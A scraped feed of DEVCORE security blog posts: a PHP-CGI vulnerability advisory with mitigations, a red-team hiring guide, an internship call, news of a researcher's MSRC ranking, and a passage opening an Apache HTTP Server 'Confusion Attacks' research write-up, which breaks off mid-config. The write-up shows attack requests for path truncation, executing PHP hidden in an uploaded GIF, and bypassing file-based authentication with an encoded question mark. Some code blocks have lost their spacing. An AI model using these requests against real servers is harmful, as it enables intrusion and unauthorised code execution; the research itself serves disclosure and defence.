如何確認自己易遭受攻擊?

對於常見之 Apache HTTP Server 加上 PHP 組合,網站管理員可透過此文章列出之兩個方式確認伺服器是否易被攻擊。其中,情境二也是 XAMPP for Windows安裝時的預設設定,因此所有版本的 XAMPP for Windows 安裝也預設受此弱點影響。

在本文撰寫當下已驗證當 Windows 作業系統執行於下列語系時,未授權的攻擊者可直接在遠端伺服器上執行任意程式碼:

  • 繁體中文 (字碼頁 950)
  • 簡體中文 (字碼頁 936)
  • 日文 (字碼頁 932)

對於其它執行在英文、韓文、西歐語系之 Windows 作業系統,由於 PHP 使用情境廣泛、暫無法完全列舉並排除其利用情境,因此還是建議使用者全面盤點資產、確認使用情境並更新 PHP 至最新版本確保萬無一失!

情境一: 將 PHP 設定於 CGI 模式下執行

在 Apache Httpd 設定檔中透過 Action語法將對應的 HTTP 請求交給 PHP-CGI 執行檔處理時,受此弱點影響,常見設定包含但不限於:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

<FilesMatch"\.php$">
SetHandler application/x-httpd-php-cgi
</FilesMatch>
Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

情境二: 將 PHP 執行檔暴露在外 (XAMPP 預設安裝設定)

即使未設定 PHP 於 CGI 模式下執行,僅將 PHP 執行檔暴露在 CGI 目錄下也受此弱點影響,常見情況包含但不限於:

  1. php.exephp-cgi.exe複製到 /cgi-bin/目錄中
  2. 將 PHP 安裝目錄透過 ScriptAlias暴露到外,如:
     ScriptAlias /php-cgi/ "C:/xampp/php/"

修補建議

強烈建議所有使用者升級至 PHP 官方最新版本 8.3.88.2.208.1.29,對於無法升級的系統可透過下列方式暫時緩解弱點。

除此之外,由於 PHP CGI 已是一種過時且易於出現問題的架構,也建議評估遷移至較為安全的 Mod-PHP、FastCGI 或是 PHP-FPM 等架構可能性。

1. 對無法更新 PHP 的使用者

可透過下列 Rewrite 規則阻擋攻擊,請注意此份規則只作為繁體中文、簡體中文及日文語系中的暫時性緩解機制,實務上仍建議更新到已修復版本或更改架構。

RewriteEngineOnRewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

2. 對 XAMPP for Windows 使用者

在撰寫本文的當下,XAMPP 尚未針對此漏洞釋出相對應的更新安裝檔,如確認自身的 XAMPP 並無使用到 PHP CGI 之功能,可透過修改下列 Apache Httpd 設定檔以避免暴露在弱點中:

C:/xampp/apache/conf/extra/httpd-xampp.conf

找到相對應的設定行數:

ScriptAlias /php-cgi/ "C:/xampp/php/"

並將其註解:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

漏洞回報時間軸

  • 2024/05/07 - DEVCORE 透過 PHP 官方弱點通報頁面回報此問題。
  • 2024/05/07 - PHP 開發者確認弱點並強調要盡快修復。
  • 2024/05/16 - PHP 開發者釋出第一版修復並尋求建議。
  • 2024/05/18 - PHP 開發者釋出第二版修復並尋求建議。
  • 2024/05/20 - PHP 進入新版本發布準備。
  • 2024/06/06 - PHP 發布新版本 8.3.88.2.208.1.29

參考資料

紅隊演練專家應徵指南

$
0
0

紅隊演練是 DEVCORE 最核心的業務。我們擁有豐富的實戰經驗,並且集結了一群優秀的夥伴共同迎接挑戰。很多技術愛好者希望加入我們,想要了解我們錄取新人所看重的方向。趁著畢業季求職潮,我們特別準備了這份應徵指南,希望幫助有興趣的人了解準備方向,也希望幫助一些剛畢業、不擅長撰寫履歷、不擅長在面試中表達自己的人,補足必要技能以免錯失機會。無論您對紅隊演練專家或滲透測試工程師感興趣,期望可以循著這份指南,成為我們的夥伴。

順帶一提,有一個在學生可能感興趣的資訊:DEVCORE 有研發替代役名額,唯名額有限,推薦您在學期間盡早投遞履歷並詢問替代役狀況。

🚀 DEVCORE 應徵流程

應徵紅隊演練專家、滲透測試工程師都會經歷「書面審查」、「線上測驗」、「面試」三個階段。

📌 書面審查

履歷是這個階段主要評估依據,以下 4 點是我們認為應徵者需要注意的地方:

履歷內容符合職務需求嗎

這個階段最重要的是說服審核者你具備職務需求的能力,所以請盡量在履歷內容附上能幫助別人判斷的佐證資訊。過去有些技術底不錯的同學只單純放了學歷,這樣要讓審核者想找個可以進入下一階段的理由都難,相當可惜。

用一些實例說明吧

實例證明是讓你的履歷脫穎而出的關鍵,具體的數字和事實可以大大增加履歷的說服力,例如能具體說出打過多少場滲透測試,在過程中找了多少漏洞,或在任務中解決了什麼樣的問題,達到什麼效果。這些不僅能表示技術能力,還能顯示你的影響力。

提供有幫助的額外資訊

相關專業證照、參與技術社群、貢獻開源專案等額外資訊都有助於審核者評估。有些人好奇一些非技術等經驗應不應該放在履歷中,我們預設是不會特別參考,但如果你認為這些經驗對未來工作有正面影響,可附上讓審核者評估。

特別希望列出的加分項

下面列出一些非必要但有會很不錯的加分項目,如果有這方面的經歷務必要寫上。同時也列出每個項目中我們看重的特質,如果有其他可以展現這些特質的經歷也歡迎列出來讓審核者知道。

📄 實戰經驗如:CVE、bug bounty
  • 代表您擁有解決未知問題能力。
  • 代表您能看到別人所沒有關注到的細節。
📄 CTF Writeups 或是 Blog
  • 如果在 CTF 比賽有不錯的成績,通常意味著你擁有在短時間內分析歸納重點的能力、也能夠快速找到解決辦法,聯想力創造力可能也不差。
  • 我們希望能了解您如何描述複雜的漏洞,因為在將來的工作中需要將漏洞過程清楚描述並給予建議。
  • 寫 Blog 除了能展現表達和文字能力外,通常也具有持續學習的熱情和樂於分享的特質,符合 DEVCORE 核心價值觀。
📄 CTF 出題經驗
  • 代表平常會持續關注流行的技術、研究語言或框架特性,能注意到一些鮮少人知道的小細節。
  • 說明你除了攻擊,還具備一定程度的開發能力。
  • 為了怕題目被 CTF 玩家惡意破壞,通常出題者也具備高水準的防禦能力。

📌 線上測驗

這個階段的進行方式與一般線上靶機環境如 OSCP、HTB 無異,會分配到一個題組,平均需要解五把 flag。應徵者會有相當足夠的時間進行解題(預設 10 天,視題目會微調),最後交付報告。我們期待從線上測驗中看到應徵者具備下述能力:

  • 偵查:能否透過現有資訊合理推斷背後的架構或寫法。
  • 漏洞挖掘:能否找到題目中設計的漏洞。
  • 應變:碰到特殊的環境可否自行想辦法克服。例如在只有 command injection 且內網有防火牆限制的特殊環境下,怎麼用手邊可利用的資源達成你的目標。

📌 面試

最後的面試階段會全面評估你是否適合這個職位,下述 2 件事情特別想與應徵者分享:

被問倒是正常的

在面試過程中,面試官會從多個角度深入了解應徵者技術的廣度和深度,因此,會被問倒是正常的。請對自己的技術能力有信心,畢竟你已經通過了第二階段的線上測驗。被問到不熟悉的問題時,只要誠實地表達你的思考過程和解決問題的方法即可。我們想要知道思考脈絡,甚至期待你說:我看到 XX 特徵覺得這題可能是 OO 方向解,我會想用什麼關鍵字搜尋找答案。這樣的回答也凸顯了你的判斷力和解決問題的能力。

分享你的 Hack 故事

我們期待在面試中聽你分享過去特別的 Hack 經歷,並且與你討論細節。Hack 的內容不限,例如:

  • 履歷中提到的 CVE、bug bounty
    • 希望是一些特別的情境,如果找到的是常見漏洞如 SQLi 或 XSS,那會希望了解這個漏洞特別在哪?或者是能說出你做了什麼,為什麼你能找到這個漏洞?
  • 在 CTF 比賽中想到的精妙解法
  • 生活中為了達成目標做的 Hack
    • 例如:為了自動化工作流程寫了個小工具;為了租房資訊串了個方便通知系統;想把遊戲每日領取任務自動化。

🚀 自我鍛鍊之路

這一段寫給現在還在準備階段,未來很想要加入資安檢測行業的同學。為了增加自己的實力,在應徵前有下面幾個精進事項可參考,這對在資安領域長遠發展也很有幫助。

📌 補足基礎知識

Web 常見漏洞種類

我們認為 PortSwigger Web Security Academy整理的漏洞經典且完整,加上有 LAB 可以直接練習,適合初學者。這些漏洞是從事資安檢測最基礎的溝通語言,推薦要把教材頁面上所有漏洞練習完,可以從主題頁面看分類會比較清楚。若以紅隊為目標,我們會優先關注能拿 shell 的後端漏洞。 以下提供幾點自我驗證與精進項目:

  • 抽一個漏洞是否可以說出這個漏洞常發生在什麼功能?背後的成因?通常可以怎麼進階利用這個漏洞?
  • 有沒有辦法在黑箱狀態,透過測試辨識出這些漏洞?
  • 在白箱狀態下,知道哪些漏洞要透過搜尋什麼函數找到?
  • 我們在面試中喜歡問各種漏洞怎麼拿 shell 的問題,因為這就是紅隊演練目標的第一步。搜尋 “from XSS to RCE” 這類的關鍵字能找到相當多案例(XSS 可以取代成 SQLi 等漏洞)。

紅隊戰術與技巧

控制一台電腦後,仍需要在內網中擴散完成任務目標。ired.team提供了一本紅隊技巧工具書,推薦閱讀以了解在不同階段有哪些招式可用。對 DEVCORE 而言,我們優先關注「Active Directory & Kerberos Abuse」、「Credential Access & Dumping」、「Lateral Movement」章節下的技能。此外,「Network pivoting & tunneling」的概念和技巧也是我們會關注的能力,ired.team 在這塊著墨較少,這篇文章涵蓋了必要知識和工具可參考。 以終為始學習,希望在練習這些技巧和工具後,能對下面的問題有自己的看法:

如果打下企業一台外網服務,而你的目標是該企業內網網域控制器(情境架構可自行假設):

  • 為了打 AD,你在打下的外網伺服器上會做哪些事情?為什麼?過程中你偏好使用什麼工具?偏好的原因是什麼?
  • 同上,這台伺服器如果有網域帳號你之後會做哪些事情?如果沒有網域帳號呢?
  • 想拿下網域控制器,心中能否馬上跳出五種以上的方法?你會優先嘗試什麼方法?為什麼?
  • 過程中橫向移動偏好使用什麼工具?為什麼?

📌 練習

虛擬靶機練習

除了知識外,也要找一些模擬環境培養手感。知名的 Hack The Box 和 OffSec 都有推出學習路徑和豐富的靶機:

選擇適合自己的平台練習即可。也可以單純打 HTB Labs靶機,練到覺得每次解題目要做的事情都類似,開始覺得題目有套路感就可以了,一些特殊解法在現階段不需糾結。過去有玩 HTB 的實習生在錄取前附上的 Writeups 大概會寫 30~50 台靶機,這個數量級或許可以參考。另外若要練習打網域,最近 GitHub 上有一個 GOAD LAB專案滿值得參考。

如果想考證照,我們有考過覺得對提昇檢測工作能力有幫助的有:

註:以上僅提供已知有幫助的證照,不代表其他證照沒有幫助

實戰練習

最推薦的還是到真實場域來看看。

  • 白箱練習:可以嘗試找你熟悉或喜歡的 GitHub 專案,先看這個專案過去的漏洞,試試看如果自己白箱看有沒有辦法能追到。如果這些有正解的漏洞都能順利找到,接著就開始找一些 Open Source 專案來挖掘 0-day 吧。
  • 黑箱練習:參與 bug bounty 計畫,挑戰真實世界的安全問題。台灣企業的計畫可以參考 HITCON ZeroDay,國外則推薦 HackerOne上面的目標。這些計畫會讓你面對更複雜和多樣的攻擊場景,提升你的實戰能力。

📌 找同伴一起

在資安這條路上,找到志同道合的夥伴一起學習、一起打 CTF、一起挖漏洞絕對比獨自升級來的有效率,下列活動可考慮參加:

  • HITCON Community: 幾乎所有資安社群都會聚集在這個研討會,可以在研討會中找一個適合自己的社群參與。
  • AIS3: 聚集台灣幾乎所有對資安有興趣的在學生。滿有機會在這邊認識志同道合的朋友。
  • 台灣好厲駭 Deep Hacking 讀書會: 全台灣探討資安最深最扎實的讀書會之一,參加絕對可以提昇視野、也能認識各種高手。內容偏 Binary 但目前漸漸在轉型中,希望不分類以挖掘漏洞為主。
  • DEVCORE 實習生計畫: 每年一月中和七月中會招生,如果目的是應徵 DEVCORE,參加計畫問導師應該是最快的。

如果你想知道更多資源,台灣資安 / CTF 學習資源整理整理的資源值得參考。

🚀 小結

本篇指南分成兩部分:前半部主要在給應徵者一些小提醒,希望應徵者能把最好的一面呈現出來。後半部提供一個學習的脈絡,希望給還在學習階段的人一個比較清楚的方向。

最終,我們都希望台灣有越來越多熱愛技術的人進入資安產業。希望,未來能持續在資安領域看見正在閱讀的你。


DEVCORE 2024 第六屆實習生計畫

$
0
0

DEVCORE 創立迄今已逾十年,持續專注於提供主動式資安服務,並致力尋找各種安全風險及漏洞,讓世界變得更安全。為了持續尋找更多擁有相同理念的資安新銳、協助學生建構正確資安意識及技能,我們成立了「戴夫寇爾全國資訊安全獎學金」,2022 年初開始舉辦首屆實習生計畫,目前為止成果頗豐、超乎預期,第五屆實習生計畫也將於今年 7 月底告一段落。我們很榮幸地宣佈,第六屆實習生計畫即將登場,若您期待加入我們、精進資安技能,煩請詳閱下列資訊後來信報名!

實習內容

本次實習分為 Research 及 Red Team 兩個組別,主要內容如下:

  • Research (Binary/Web) 以研究為主,在與導師確定研究標的後,分析目標架構、進行逆向工程或程式碼審查。藉由這個過程訓練自己的思路,找出可能的攻擊面與潛在的弱點。另外也會讓大家嘗試分析及撰寫過往漏洞的 Exploit,理解過去漏洞都出現在哪,體驗真實世界的漏洞都是如何利用。
    • 漏洞挖掘及研究 60 %
    • 1-day 開發 (Exploitation) 30 %
    • 成果報告與準備 10 %
  • Red Team 研究並深入學習紅隊常用技巧,熟悉實戰中會遇到的情境、語言與架構。了解常見漏洞的成因、實際利用方法、嚴苛條件下的利用策略、黑箱測試方式及各種奇技淫巧。學習後滲透時的常見限制、工具概念與原理。
    • 漏洞與技巧的研究及深入學習 70 %
    • Lab 建置或 Bug Bounty 或漏洞挖掘 30 %

公司地點

台北市松山區八德路三段 32 號 13 樓

實習時間

  • 2024 年 9 月開始到 2025 年 1 月底,共 5 個月。
  • 每週工作兩天,工作時間為 10:00 – 18:00
    • 每週固定一天下午 14:00 - 18:00 必須到公司討論進度
      • 如果居住雙北外可彈性調整(但須每個組別統一)
    • 其餘時間皆為遠端作業

招募對象

  • 具有一定程度資安背景的學生,且可每週工作兩天
  • 此外並無其他招募限制,歷屆實習生可重複應徵
  • 對資格有任何疑慮,歡迎來信詢問

預計招收名額

  • Research 組:2~3 人
  • Red Team 組:2~3 人

薪資待遇

每月新台幣 16,000 元

招募條件資格與流程

實習條件要求

Research (Binary/Web)

  • 基本漏洞利用及挖掘能力
  • 具備研究熱誠,習慣了解技術本質
  • 熟悉任一種 Scripting Language(如:Shell Script、Python、Ruby),並能使用腳本輔以研究
  • 具備除錯能力,能善用 Debugger 追蹤程式流程、能重現並收斂問題
  • 具備獨立分析開放原始碼專案的能力,能透過分析程式碼理解目標專案的架構
  • 熟悉並理解常見的漏洞成因
    • OWASP Web Top 10
    • Memory Corruption
    • Race Condition
  • 加分但非必要條件
    • CTF 比賽經驗
    • pwnable.tw 成績
    • 有公開的技術 blog/slide、write-ups 或是演講
    • 精通 IDA Pro 或 Ghidra
    • 熟悉任一種網頁程式語言或框架(如:PHP、ASP.NET、Express.js),具備可以建立完整網頁服務的能力
    • 理解 PortSwigger Web Security Academy中的安全議題
    • 獨立挖掘過 0-day 漏洞,或分析過 1-day 的經驗
    • 具備下列其中之一經驗
      • Web Application Exploit
      • Kernel Exploit
      • Windows Exploit
      • Browser Exploit
      • Bug Bounty

Red Team

  • 熟悉 OWASP Web Top 10
  • 理解 PortSwigger Web Security Academy中所有的安全議題或已完成所有 Lab
  • 理解計算機網路的基本概念
  • 熟悉任一種網頁程式開發方式(如:PHP、ASP.NET、JSP),具備可以建立完整網頁服務的能力
  • 熟悉任一種 Scripting Language(如:Shell Script、Python、Ruby),並能使用腳本輔以研究
  • 具備除錯能力,能善用 Debugger 追蹤程式流程、能重現並收斂問題
  • 具備可以建置、設定常見網頁伺服器(如:Nginx、Apache、Tomcat、IIS)及作業系統(如:Linux、Windows)的能力
  • 加分但非必要條件
    • 曾經獨立挖掘過 0-day 漏洞
    • 曾經獨立分析過已知漏洞並能撰寫 1-day Exploit
    • 曾經於 CTF 比賽中擔任出題者並建置過題目
    • 擁有 OSCP 證照或同等能力之證照

應徵流程

本次甄選一共分為二個階段:

第一階段:書面審查

第一階段為書面審查,會需要審查下列兩個項目

  • 履歷內容
  • 簡答題答案
    • 應徵 Research 實習生:
      • 題目一:漏洞重現與分析過程
        • 請提出一個,你印象最深刻或感到有趣、於西元 2022 ~ 2024 年間公開的真實漏洞或攻擊鏈案例,並依自己的理解詳述說明漏洞的成因、利用條件和可以造成的影響。同時,嘗試描述如何復現此漏洞或攻擊鏈,即使無法成功復現,也請記錄研究過程。報告撰寫請參考範本,盡可能詳細,中英不限。
      • 題目二:實習期間想要研究的主題
        • 請提出三個可能選擇的明確主題,並簡單說明提出的理由或想完成的內容,例如:
          • 研究◯◯開源軟體,找到可 RCE 的重大風險弱點。
          • 研究常見的路由器,目標包括:AA-123 路由器、BB-456 無線路由器。
          • 研究常見的筆記平台或軟體,目標包括:XX Note、YY Note。
    • 應徵 Red Team 實習生:
      • 請提出兩個於西元 2022 ~ 2024 年間公開的、與 Web 攻擊面、漏洞或攻擊鏈相關的演講。請說明為什麼挑選這些演講並解釋它們為什麼有趣。用你的話詳細解釋這些演講的細節,並提供任何你覺得可以輔助或證明你理解的附加資料。這些演講可以來自包含但不限於 Black Hat、DEF CON、OffensiveCon、POC、ZeroConf、Hexacon、HITCON、TROOPERS CONFERENCE 等會議。

本階段收件截止時間為 2024/08/09 23:59,我們會根據您的履歷及題目所回答的內容來決定是否有通過第一階段,我們會在 10 個工作天內回覆。

第二階段:面試

此階段為 30~120 分鐘(依照組別需求而定,會另行通知)的面試,會有 2~3 位資深夥伴參與,評估您是否具備本次實習所需的技術能力與人格特質。

時間軸

  • 2024/07/18 - 2024/08/09 公開招募
  • 2024/08/12 - 2024/08/22 面試
  • 2024/08/26 前回應結果
  • 2024/09/02 第六屆實習計畫於當週開始

報名方式

  • 請將您的履歷題目答案以 PDF 格式寄到 recruiting_intern@devco.re
    • 履歷格式請參考範例示意(DOCXPAGESPDF)並轉成 PDF。若您有自信,也可以自由發揮最能呈現您能力的履歷。
    • 請於 2024/08/09 23:59前寄出(如果名額已滿則視情況提早結束)
  • 信件標題格式:[應徵] 職位 您的姓名(範例:[應徵] Red Team 組實習生 王小美)
  • 履歷內容請務必控制在三頁以內,至少需包含以下內容:
    • 基本資料
    • 學歷
    • 實習經歷
    • 社群活動經歷
    • 特殊事蹟
    • 過去對於資安的相關研究
    • MBTI 職業性格測試結果(測試網頁

若有應徵相關問題,請一律使用 Email 聯繫,如造成您的不便請見諒,我們感謝您的來信,並期待您的加入!

MSRC 2024 Most Valuable Security Researchers - Angelboy

$
0
0

We’re thrilled to announce that Angelboy, senior security researcher at DEVCORE, is named one of Microsoft’s MSRC 2024 Most Valuable Security Researchers! He not only secured the #33 spot on the overall list but also achieved the #9 position in the Windows category.

This is the first time Angelboy has been shortlisted on this annual leaderboard, and he is also the highest-ranked Taiwanese security researcher featured. This prestigious accomplishment highlights his exceptional expertise and significant contributions to the field.

The Microsoft Security Response Center (MSRC) has long recognized the efforts of security researchers who partner with Microsoft in reporting vulnerabilities through its Microsoft Researcher Recognition Program (MRRR). The program expresses gratitude for their contributions to the security of Microsoft’s global customers and products.

The MSRC 2024 Most Valuable Security Researchers list, announced on August 7th, is based on the total number of points the researchers earned for each valid report from July 2023 to June 2024. Angelboy secured the #33 spots on the leaderboard. Specifically, his dedicated passion for Windows Kernel research earned him a #9 ranking in the Windows category, placing him in the TOP 10. He was also awarded “Accuracy” and “Volume” badges, further highlighting his significant contributions to vulnerability research.

References:

Angelboy 入列微軟 MSRC 2024 前百大最有價值資安研究員!

$
0
0

恭喜 DEVCORE 資深資安研究員 Angelboy 榮獲 Microsoft 的 MSRC 2024 Most Valuable Security Researchers 的殊榮!除了在不分項 TOP 100 名單中榮獲 #33 名,在 Angelboy 長年研究的 Windows 領域中,他更以 #9 的名次擠入前十大行列。

這不僅是 Angelboy 首次登上該年度榜單,同時也是該名單中排名最高的台灣資安研究員。

Microsoft 旗下的 Microsoft Security Response Center(MSRC,或稱 Microsoft 安全性回應中心)長期藉 Microsoft Researcher Recognition Program(MRRR)計畫,公開表揚協助 Microsoft 挖掘系統安全漏洞的資安研究員,以此致謝優秀資安研究員為 Microsoft 的客戶及產品安全所付出的努力。

Microsoft 於 7 日公布的 MSRC 2024 Most Valuable Security Researchers 名單,是根據 2023 年 7 月至 2024 年 6 月,全球各地資安研究員向 MSRC 回報的漏洞得分所統計而得。在整體不分項名單中,Angelboy 獲得了 #33 名的殊榮。而針對 Microsoft 旗下各類型產品的 Windows 類別中,Angelboy 則入列 TOP 10,獲得 #9 的成績,並經認證全數漏洞回報皆為有效回報。

再次恭喜 Angelboy 奪得此一殊榮!

參考資料:

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

$
0
0
Orange Tsai (@orange_8361)  |  繁體中文版本 |  English Version

Hey there! This is my research on Apache HTTP Server presented at Black Hat USA 2024. Additionally, this research will also be presented at HITCON and OrangeCon. If you’re interested in getting a preview, you can check the slides here:

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

Also, I would like to thank Akamai for their friendly outreach! They released mitigation measures immediately after this research was published (details can be found on Akamai’s blog).


TL;DR

This article explores architectural issues within the Apache HTTP Server, highlighting several technical debts within Httpd, including 3 types of Confusion Attacks, 9 new vulnerabilities, 20 exploitation techniques, and over 30 case studies. The content includes, but is not limited to:

  1. How a single ? can bypass Httpd’s built-in access control and authentication.
  2. How unsafe RewriteRules can escape the Web Root and access the entire filesystem.
  3. How to leverage a piece of code from 1996 to transform an XSS into RCE.


Outline


Before the Story

This section is just some personal murmurs. If you’re only interested in the technical details, jump straight to — How Did the Story Begin?

As a researcher, perhaps the greatest joy is seeing your work recognized and understood by peers. Therefore, after completing a significant research with fruitful results, it is natural to want the world to see it — which is why I’ve presented multiple times at Black Hat USA and DEFCON. As you might know, since 2022, I have been unable to obtain a valid travel authorization to enter the U.S. (For Taiwan, travel authorization under the Visa Waiver Program can typically be obtained online within minutes to hours), leading me to miss the in-person talk at Black Hat USA 2022. Even a solo trip to Machu Picchu and Easter Island in 2023 couldn’t transit through the U.S. :(

To address this situation, I started preparing for a B1/B2 visa in January this year, writing various documents, interviewing at the embassy, and endlessly waiting. It’s not fun. But to have my work seen, I still spent a lot of time seeking all possibilities, even until three weeks before the conference, it was unclear whether my talk would be canceled or not (BH only accepted in-person talks, but thanks to the RB, it could ultimately be presented in pre-recorded format). So, everything you see, including slides, videos, and this blog, was completed within just a few dozen days. 😖

As a pure researcher with a clear conscience, my attitude towards vulnerabilities has always been — they should be directly reported to and fixed by the vendor. Writing these words isn’t for any particular reason, just to record some feelings of helplessness, efforts in this year, and to thank those who have helped me this year, thank you all :)


How Did the Story Begin?

Around the beginning of this year, I started thinking about my next research target. As you might know, I always aim to challenge big targets that can impact the entire internet, so I began searching for some complex topics or interesting open-source projects like Nginx, PHP, or even delved into RFCs to strengthen my understanding of protocol details.

While most attempts ended in failure (though a few might become topics for next blog posts 😉), reading these codes reminded me of a quick review I had done of Apache HTTP Server last year! Although I didn’t dive deep into the code due to the work schedule, I had already “smelled” something not quite right about its coding style at that time.

So this year, I decided to continue on that research, transforming the “bad smells” from an indescribable “feeling” into concrete research on Apache HTTP Server!


Why Apache HTTP Server Smells Bad?

Firstly, the Apache HTTP Server is a world constructed by “modules,” as proudly declared in its official documentation regarding its modularity:

Apache httpd has always accommodated a wide variety of environments through its modular design. […] Apache HTTP Server 2.0 extends this modular design to the most basic functions of a web server.

The entire Httpd service relies on hundreds of small modules working together to handle a client’s HTTP request. Among the 136 modules listed by the official documentation, about half are either enabled by default or frequently used by websites!

What’s even more surprising is that these modules also maintain a colossal request_rec structure while processing client HTTP requests. This structure includes all the elements involved in handling HTTP, with its detailed definition available in include/httpd.h. All modules depend on this massive structure for synchronization, communication, and data exchange. As an HTTP request passes through several phases, modules act like players in a game of catch, passing the structure from one to another. Each module even has the ability to modify any value in this structure according to its own preferences!

This type of collaboration is not new from a software engineering perspective. Each module simply focuses on its own task. As long as everyone finishes their work, then the client can enjoy the service provided by Httpd. This approach might work well with a few modules, but what happens when we scale it up to hundreds of modules collaborating — can they really work well together?🤔

Our starting point is straightforward — the modules do not fully understand each other, yet they are required to cooperate. Each module might be implemented by different people, with the code undergoing years of iterations, refactors, and modifications. Do they really still know what they are doing? Even if they understand their own duty, what about other modules’ implementation details? Without any good development standards or guidelines, there must be several gaps that we can exploit!


A Whole New Attack — Confusion Attack

Based on these observations, we started focusing on the “relationships” and “interactions” among these modules. If a module accidentally modifies a structure field that it considers unimportant, but is crucial for another module, it could affect the latter’s decisions. Furthermore, if the definitions or semantics of the fields are not precise enough, causing ambiguities in how modules understand the same fields, it could lead to potential security risks as well!

From this starting point, we developed three different types of attacks, as these attacks are more or less related to the misuse of structure fields. Hence, we’ve named this attack surface “Confusion Attack,” and the following are the attacks we developed:

  1. Filename Confusion
  2. DocumentRoot Confusion
  3. Handler Confusion

Through these attacks, we have identified 9 different vulnerabilities:

  1. CVE-2024-38472 - Apache HTTP Server on Windows UNC SSRF
  2. CVE-2024-39573 - Apache HTTP Server proxy encoding problem
  3. CVE-2024-38477 - Apache HTTP Server: Crash resulting in Denial of Service in mod_proxy via a malicious request
  4. CVE-2024-38476 - Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect
  5. CVE-2024-38475 - Apache HTTP Server weakness in mod_rewrite when first segment of substitution matches filesystem path
  6. CVE-2024-38474 - Apache HTTP Server weakness with encoded question marks in backreferences
  7. CVE-2024-38473 - Apache HTTP Server proxy encoding problem
  8. CVE-2023-38709 - Apache HTTP Server: HTTP response splitting
  9. CVE-2024-?????? - [redacted]

These vulnerabilities were reported through the official security mailing list and were addressed by the Apache HTTP Server in the 2.4.60 update published on 2024-07-01.

As this is a new attack surface from Httpd’s architectural design and its internal mechanisms, naturally, the first person to delve into it can find the most vulnerabilities. Thus, I currently hold the most CVEs from Apache HTTP Server 😉. it leads to many updates that are not backward compatible. Therefore, patching these issues is not easy for many long-running production servers. If administrators update without careful consideration, they might disrupt existing configurations, causing service downtime. 😨

Now, it’s time to get started with our Confusion Attacks! Are you ready?


🔥 1. Filename Confusion

The first issue stems from confusion regarding the filename field. Literally, r->filename should represent a filesystem path. However, in Apache HTTP Server, some modules treat it as a URL. If, within an HTTP context, most modules consider r->filename as a filesystem path but some others treat it as a URL, this inconsistency can lead to security issues!


⚔️ Primitive 1-1. Truncation

So, which modules treat r->filename as a URL? The first is mod_rewrite, which allows sysadmins to easily rewrite a path pattern to a specified substitution target using the RewriteRule directive:

RewriteRule Pattern Substitution [flags]

The target can be either a filesystem path or a URL. This feature likely exists for user experience. However, this “convenience” also introduces risks. For instance, while rewriting the target paths, mod_rewrite forcefully treats all results as a URL, truncating the path after a question mark %3F. This leads to the following two exploitations.

Path: modules/mappers/mod_rewrite.c#L4141

/*
 * Apply a single RewriteRule
 */staticintapply_rewrite_rule(rewriterule_entry*p,rewrite_ctx*ctx){ap_regmatch_tregmatch[AP_MAX_REG_MATCH];apr_array_header_t*rewriteconds;rewritecond_entry*conds;// [...]for(i=0;i<rewriteconds->nelts;++i){rewritecond_entry*c=&conds[i];rc=apply_rewrite_cond(c,ctx);// [...] do the remaining stuff}/* Now adjust API's knowledge about r->filename and r->args */r->filename=newuri;if(ctx->perdir&&(p->flags&RULEFLAG_DISCARDPATHINFO)){r->path_info=NULL;}splitout_queryargs(r,p->flags);// <------- [!!!] Truncate the `r->filename`// [...]}
✔️ 1-1-1. Path Truncation

The first primitive leverages this truncation on the filesystem path. Imagine the following RewriteRule:

RewriteEngineOnRewriteRule"^/user/(.+)$""/var/user/$1/profile.yml"

The server would open the corresponding profile based on the username followed by the path /user/, for example:

$ curl http://server/user/orange
 # the output of file `/var/user/orange/profile.yml`

Since mod_rewrite forcibly treats all rewritten result as a URL, even when the target is a filesystem path, it can be truncated at a question mark, cutting off the tailing /profile.yml, like:

$ curl http://server/user/orange%2Fsecret.yml%3F
 # the output of file `/var/user/orange/secret.yml`

This is our first primitive — Path Truncation. Let’s pause our exploration of this primitive here for a moment. Although it might seem like a minor flaw for now, remember it— it will reappear in later attacks, gradually tearing open this seemingly little breach! 😜

✔️ 1-1-2. Mislead RewriteFlag Assignment

The second exploitation of the truncation primitive is to mislead the assignment of RewriteFlags. Imagine a sysadmin managing websites and their corresponding handlers through the following RewriteRule:

RewriteEngineOnRewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

If a request ends with the .php extension, it adds the corresponding handler for the mod_php (this can also be an Environment Variable or Content-Type; you can refer to the official RewriteRule Flags manual for details).

Since the truncation behavior of the mod_rewrite occurs after the regular expression match, an attacker can use the original rule to apply flags to requests they shouldn’t apply to by using a ?. For example, an attacker could upload a GIF image embedded with malicious PHP code and execute it as a backdoor through the following crafted request:

$ curl http://server/upload/1.gif
 # GIF89a <?=`id`;>$ curl http://server/upload/1.gif%3fooo.php
 # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)


⚔️ Primitive 1-2. ACL Bypass

The second primitive of Filename Confusion occurs in the mod_proxy. Unlike the previous primitive which treats targets as a URL in all cases, this time the authentication and access control bypass is caused by the inconsistent semantic of r->filename among the modules!

It actually makes sense for the mod_proxy to treat r->filename as a URL, given that the primary purpose of a Proxy is to “redirect” requests to other URLs. However, security issues when different components interact — especially the case when most modules by default treat the r->filename as a filesystem path, imagine you use a file-based access control, and now mod_proxy treats r->filename as a URL; this inconsistency can lead to the access control or authentication bypass!

A classic example is when sysadmins use the Files directive to restrict a single file, like admin.php:

<Files"admin.php">
AuthTypeBasicAuthName"Admin Panel"AuthUserFile"/etc/apache2/.htpasswd"Require valid-user
</Files>

This type of configuration can be bypassed directly under the default PHP-FPM installation! It’s also worth mentioning that this is one of the most common ways to configure authentication in Apache HTTP Server! Suppose you visit a URL like this:

http://server/admin.php%3Fooo.php

First, in the HTTP lifecycle at this URL, the authentication module will compare the requested filename with the protected files. At this point, the r->filename field is admin.php?ooo.php, which obviously does not match admin.php, so the module will assume that the current request does not require authentication. However, the PHP-FPM configuration is set to forward requests ending in .php to the mod_proxy using the SetHandler directive:

Path: /etc/apache2/mods-enabled/php8.2-fpm.conf

# Using (?:pattern) instead of (pattern) is a small optimization that# avoid capturing the matching pattern (as $1) which isn't used here<FilesMatch".+\.ph(?:ar|p|tml)$">
